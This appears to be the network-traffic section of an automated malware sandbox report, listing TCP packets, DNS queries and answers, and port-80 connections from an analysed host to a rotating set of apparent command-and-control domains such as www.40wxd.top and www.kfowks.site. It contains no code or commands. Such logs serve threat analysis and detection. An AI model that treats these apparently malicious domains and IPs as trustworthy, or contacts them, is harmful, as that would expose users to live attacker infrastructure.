                                                      Sep 11, 2024 11:20:01.543066025 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.543495893 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.547657967 CEST6335980192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:02.590848923 CEST6335980192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:03.611649036 CEST6336080192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:03.617660999 CEST8063360188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:03.623640060 CEST6336080192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:03.627640963 CEST6336080192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:03.633013010 CEST8063360188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:04.080636978 CEST8063360188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:04.080693007 CEST8063360188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:04.080885887 CEST6336080192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:04.083642960 CEST6336080192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:04.089278936 CEST8063360188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:09.755656004 CEST6336180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:09.764311075 CEST80633613.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:09.764522076 CEST6336180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:09.775651932 CEST6336180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:09.780797005 CEST80633613.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:10.229926109 CEST80633613.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:10.230010033 CEST6336180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:11.278511047 CEST6336180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:11.283483982 CEST80633613.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:12.297652006 CEST6336280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:12.302777052 CEST80633623.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:12.303778887 CEST6336280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:12.315643072 CEST6336280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:12.320472956 CEST80633623.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:12.762411118 CEST80633623.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:12.762485981 CEST6336280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:13.827655077 CEST6336280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:13.832870960 CEST80633623.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.844801903 CEST6336380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:14.851836920 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.851913929 CEST6336380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:14.867248058 CEST6336380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:14.872250080 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872270107 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872282982 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872294903 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872307062 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872514963 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872526884 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872539043 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872550964 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:15.332469940 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:15.332520008 CEST6336380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:16.372190952 CEST6336380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:16.377065897 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:17.390634060 CEST6336480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:17.395531893 CEST80633643.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:17.395622969 CEST6336480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:17.402164936 CEST6336480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:17.406986952 CEST80633643.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:17.879173040 CEST80633643.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:17.879319906 CEST80633643.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:17.882452965 CEST6336480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:17.885723114 CEST6336480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:17.890518904 CEST80633643.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:23.298901081 CEST6336580192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:23.303859949 CEST8063365206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:23.303944111 CEST6336580192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:23.318247080 CEST6336580192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:23.323198080 CEST8063365206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:24.193732023 CEST8063365206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:24.194000006 CEST8063365206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:24.194164991 CEST6336580192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:24.825638056 CEST6336580192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:25.843858004 CEST6336680192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:26.267493963 CEST8063366206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:26.267869949 CEST6336680192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:26.277415037 CEST6336680192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:26.282330990 CEST8063366206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:27.185648918 CEST8063366206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:27.185960054 CEST8063366206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:27.186100006 CEST6336680192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:27.397645950 CEST8063366206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:27.397782087 CEST6336680192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:27.778522968 CEST6336680192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:28.797682047 CEST6336780192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:28.802934885 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.803005934 CEST6336780192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:28.819073915 CEST6336780192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:28.824112892 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824136972 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824148893 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824162960 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824174881 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824199915 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824213028 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824225903 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:28.824238062 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:29.713053942 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:29.762686968 CEST6336780192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:29.947223902 CEST8063367206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:29.947293997 CEST6336780192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:30.325695992 CEST6336780192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:31.344034910 CEST6336880192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:31.348923922 CEST8063368206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:31.348999023 CEST6336880192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:31.357500076 CEST6336880192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:31.362344980 CEST8063368206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:32.262432098 CEST8063368206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:32.262454033 CEST8063368206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:32.268338919 CEST6336880192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:32.270920038 CEST6336880192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:32.275770903 CEST8063368206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:37.364309072 CEST6336980192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:37.369143963 CEST806336965.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:37.369209051 CEST6336980192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:37.384572029 CEST6336980192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:37.390460968 CEST806336965.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:38.047235966 CEST806336965.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:38.047261000 CEST806336965.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:38.047406912 CEST6336980192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:38.887784958 CEST6336980192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:39.907728910 CEST6337080192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:39.912887096 CEST806337065.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:39.915810108 CEST6337080192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:39.927700043 CEST6337080192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:39.932492971 CEST806337065.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:40.714804888 CEST806337065.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:40.715521097 CEST806337065.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:40.715590000 CEST6337080192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:41.434803009 CEST6337080192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:42.453394890 CEST6337180192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:42.532670021 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.534504890 CEST6337180192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:42.547439098 CEST6337180192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:42.557440042 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557697058 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557708979 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557718992 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557810068 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557820082 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557827950 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557842970 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:42.557878017 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:43.198985100 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:43.199035883 CEST6337180192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:44.059773922 CEST6337180192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:44.064888954 CEST806337165.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:45.079235077 CEST6337280192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:45.084582090 CEST806337265.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:45.084661961 CEST6337280192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:45.093060970 CEST6337280192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:45.097879887 CEST806337265.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:45.743110895 CEST806337265.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:45.743184090 CEST806337265.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:45.747098923 CEST6337280192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:45.750066996 CEST6337280192.168.2.465.21.196.90
                                                      Sep 11, 2024 11:20:45.754966021 CEST806337265.21.196.90192.168.2.4
                                                      Sep 11, 2024 11:20:51.585716963 CEST6337380192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:51.590660095 CEST806337338.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:51.590744019 CEST6337380192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:51.601202965 CEST6337380192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:51.606126070 CEST806337338.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:53.091767073 CEST806337338.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:53.091788054 CEST806337338.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:53.091856956 CEST6337380192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:53.106808901 CEST6337380192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:54.126298904 CEST6337480192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:54.131577969 CEST806337438.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:54.131660938 CEST6337480192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:54.142148018 CEST6337480192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:54.147068024 CEST806337438.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:55.058460951 CEST806337438.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:55.058487892 CEST806337438.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:55.058547020 CEST6337480192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:55.653820038 CEST6337480192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:56.678848028 CEST6337580192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:56.998507023 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:56.998676062 CEST6337580192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:57.020370007 CEST6337580192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:57.025403976 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025446892 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025463104 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025535107 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025547028 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025605917 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025618076 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025629997 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.025643110 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.931412935 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.931921005 CEST806337538.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:57.935817957 CEST6337580192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:58.528405905 CEST6337580192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:59.547454119 CEST6337680192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:59.819679022 CEST806337638.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:20:59.825373888 CEST6337680192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:59.831751108 CEST6337680192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:20:59.836672068 CEST806337638.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:21:00.793679953 CEST806337638.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:21:00.793699026 CEST806337638.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:21:00.793822050 CEST6337680192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:21:00.797712088 CEST6337680192.168.2.438.181.141.122
                                                      Sep 11, 2024 11:21:00.802548885 CEST806337638.181.141.122192.168.2.4
                                                      Sep 11, 2024 11:21:09.428206921 CEST6337780192.168.2.481.88.63.46
                                                      Sep 11, 2024 11:21:09.433105946 CEST806337781.88.63.46192.168.2.4
                                                      Sep 11, 2024 11:21:09.433208942 CEST6337780192.168.2.481.88.63.46
                                                      Sep 11, 2024 11:21:09.439260960 CEST6337780192.168.2.481.88.63.46
                                                      Sep 11, 2024 11:21:09.444086075 CEST806337781.88.63.46192.168.2.4
                                                      Sep 11, 2024 11:21:10.103210926 CEST806337781.88.63.46192.168.2.4
                                                      Sep 11, 2024 11:21:10.103313923 CEST806337781.88.63.46192.168.2.4
                                                      Sep 11, 2024 11:21:10.103458881 CEST6337780192.168.2.481.88.63.46
                                                      Sep 11, 2024 11:21:10.105956078 CEST6337780192.168.2.481.88.63.46
                                                      Sep 11, 2024 11:21:10.110920906 CEST806337781.88.63.46192.168.2.4

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 11, 2024 11:17:24.246217966 CEST5127553192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:17:24.449491024 CEST53512751.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:17:33.769716978 CEST5351817162.159.36.2192.168.2.4
                                                      Sep 11, 2024 11:17:34.406877995 CEST6244353192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:17:34.413980007 CEST53624431.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:17:40.171951056 CEST6127653192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:17:40.204453945 CEST53612761.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:17:54.125217915 CEST6017453192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:17:54.651145935 CEST53601741.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:18:07.782618046 CEST5359653192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:18:07.794977903 CEST53535961.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:18:20.922744989 CEST6352453192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:18:21.096124887 CEST53635241.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:18:34.422508955 CEST5748653192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:18:35.193113089 CEST53574861.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:18:48.812932968 CEST6528153192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:18:48.831665993 CEST53652811.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:19:01.968837023 CEST5648553192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:19:01.983338118 CEST53564851.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:19:15.125559092 CEST5155153192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:19:15.155782938 CEST53515511.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:19:28.500880957 CEST5380253192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:19:28.718796968 CEST53538021.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:19:42.172229052 CEST6553353192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:19:42.304311037 CEST53655331.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:19:55.937663078 CEST5808353192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:19:55.962289095 CEST53580831.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:20:09.095891953 CEST5742453192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:20:09.751230001 CEST53574241.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:20:22.892302990 CEST6414253192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:20:23.296435118 CEST53641421.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:20:37.282587051 CEST5010253192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:20:37.361391068 CEST53501021.1.1.1192.168.2.4
                                                      Sep 11, 2024 11:20:50.766944885 CEST6130253192.168.2.41.1.1.1
                                                      Sep 11, 2024 11:20:51.583141088 CEST53613021.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Sep 11, 2024 11:17:24.246217966 CEST192.168.2.41.1.1.10xb7caStandard query (0)www.2bhp.comA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:17:34.406877995 CEST192.168.2.41.1.1.10xc1Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                      Sep 11, 2024 11:17:40.171951056 CEST192.168.2.41.1.1.10xfd29Standard query (0)www.ultraleap.netA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:17:54.125217915 CEST192.168.2.41.1.1.10x6b84Standard query (0)www.dalong.siteA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:18:07.782618046 CEST192.168.2.41.1.1.10x1de9Standard query (0)www.mgeducacaopro.onlineA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:18:20.922744989 CEST192.168.2.41.1.1.10xb408Standard query (0)www.heldhold.xyzA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:18:34.422508955 CEST192.168.2.41.1.1.10x93d4Standard query (0)www.63582.photoA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:18:48.812932968 CEST192.168.2.41.1.1.10xdbbaStandard query (0)www.useanecdotenow.techA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:01.968837023 CEST192.168.2.41.1.1.10x4f28Standard query (0)www.asiapartnars.onlineA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:15.125559092 CEST192.168.2.41.1.1.10x2b77Standard query (0)www.linkwave.cloudA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:28.500880957 CEST192.168.2.41.1.1.10x5bddStandard query (0)www.mfgarage.netA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:42.172229052 CEST192.168.2.41.1.1.10xe26cStandard query (0)www.b5x7vk.agencyA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:55.937663078 CEST192.168.2.41.1.1.10xc182Standard query (0)www.rtpngk.xyzA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:20:09.095891953 CEST192.168.2.41.1.1.10xa279Standard query (0)www.doggieradio.netA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:20:22.892302990 CEST192.168.2.41.1.1.10x2548Standard query (0)www.40wxd.topA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:20:37.282587051 CEST192.168.2.41.1.1.10x9c67Standard query (0)www.030002304.xyzA (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:20:50.766944885 CEST192.168.2.41.1.1.10xc5e9Standard query (0)www.kfowks.siteA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Sep 11, 2024 11:17:24.449491024 CEST1.1.1.1192.168.2.40xb7caNo error (0)www.2bhp.com81.88.63.46A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:17:34.413980007 CEST1.1.1.1192.168.2.40xc1Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                      Sep 11, 2024 11:17:40.204453945 CEST1.1.1.1192.168.2.40xfd29No error (0)www.ultraleap.netwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                      Sep 11, 2024 11:17:40.204453945 CEST1.1.1.1192.168.2.40xfd29No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:17:54.651145935 CEST1.1.1.1192.168.2.40x6b84No error (0)www.dalong.sitedalong.siteCNAME (Canonical name)IN (0x0001)false
                                                      Sep 11, 2024 11:17:54.651145935 CEST1.1.1.1192.168.2.40x6b84No error (0)dalong.site172.96.187.60A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:18:07.794977903 CEST1.1.1.1192.168.2.40x1de9No error (0)www.mgeducacaopro.onlinemgeducacaopro.onlineCNAME (Canonical name)IN (0x0001)false
                                                      Sep 11, 2024 11:18:07.794977903 CEST1.1.1.1192.168.2.40x1de9No error (0)mgeducacaopro.online3.33.130.190A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:18:07.794977903 CEST1.1.1.1192.168.2.40x1de9No error (0)mgeducacaopro.online15.197.148.33A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:18:21.096124887 CEST1.1.1.1192.168.2.40xb408No error (0)www.heldhold.xyz67.223.117.189A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:18:35.193113089 CEST1.1.1.1192.168.2.40x93d4No error (0)www.63582.photo6ybpt9er.as66588.comCNAME (Canonical name)IN (0x0001)false
                                                      Sep 11, 2024 11:18:35.193113089 CEST1.1.1.1192.168.2.40x93d4No error (0)6ybpt9er.as66588.comazkwupgf.as66588.comCNAME (Canonical name)IN (0x0001)false
                                                      Sep 11, 2024 11:18:35.193113089 CEST1.1.1.1192.168.2.40x93d4No error (0)azkwupgf.as66588.com147.92.40.175A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:18:48.831665993 CEST1.1.1.1192.168.2.40xdbbaNo error (0)www.useanecdotenow.techuseanecdotenow.techCNAME (Canonical name)IN (0x0001)false
                                                      Sep 11, 2024 11:18:48.831665993 CEST1.1.1.1192.168.2.40xdbbaNo error (0)useanecdotenow.tech3.33.130.190A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:18:48.831665993 CEST1.1.1.1192.168.2.40xdbbaNo error (0)useanecdotenow.tech15.197.148.33A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:01.983338118 CEST1.1.1.1192.168.2.40x4f28No error (0)www.asiapartnars.onlineasiapartnars.onlineCNAME (Canonical name)IN (0x0001)false
                                                      Sep 11, 2024 11:19:01.983338118 CEST1.1.1.1192.168.2.40x4f28No error (0)asiapartnars.online3.33.130.190A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:01.983338118 CEST1.1.1.1192.168.2.40x4f28No error (0)asiapartnars.online15.197.148.33A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:15.155782938 CEST1.1.1.1192.168.2.40x2b77No error (0)www.linkwave.cloudlinkwave.cloudCNAME (Canonical name)IN (0x0001)false
                                                      Sep 11, 2024 11:19:15.155782938 CEST1.1.1.1192.168.2.40x2b77No error (0)linkwave.cloud3.33.130.190A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:15.155782938 CEST1.1.1.1192.168.2.40x2b77No error (0)linkwave.cloud15.197.148.33A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:28.718796968 CEST1.1.1.1192.168.2.40x5bddNo error (0)www.mfgarage.net85.153.138.113A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:42.304311037 CEST1.1.1.1192.168.2.40xe26cNo error (0)www.b5x7vk.agency104.21.11.31A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:42.304311037 CEST1.1.1.1192.168.2.40xe26cNo error (0)www.b5x7vk.agency172.67.165.25A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:55.962289095 CEST1.1.1.1192.168.2.40xc182No error (0)www.rtpngk.xyz188.114.97.3A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:19:55.962289095 CEST1.1.1.1192.168.2.40xc182No error (0)www.rtpngk.xyz188.114.96.3A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:20:09.751230001 CEST1.1.1.1192.168.2.40xa279No error (0)www.doggieradio.netdoggieradio.netCNAME (Canonical name)IN (0x0001)false
                                                      Sep 11, 2024 11:20:09.751230001 CEST1.1.1.1192.168.2.40xa279No error (0)doggieradio.net3.33.130.190A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:20:09.751230001 CEST1.1.1.1192.168.2.40xa279No error (0)doggieradio.net15.197.148.33A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:20:23.296435118 CEST1.1.1.1192.168.2.40x2548No error (0)www.40wxd.top40wxd.topCNAME (Canonical name)IN (0x0001)false
                                                      Sep 11, 2024 11:20:23.296435118 CEST1.1.1.1192.168.2.40x2548No error (0)40wxd.top206.119.82.134A (IP address)IN (0x0001)false
                                                      Sep 11, 2024 11:20:37.361391068 CEST1.1.1.1192.168.2.40x9c67No error (0)www.030002304.xyz030002304.xyzCNAME (Canonical name)IN (0x0001)false
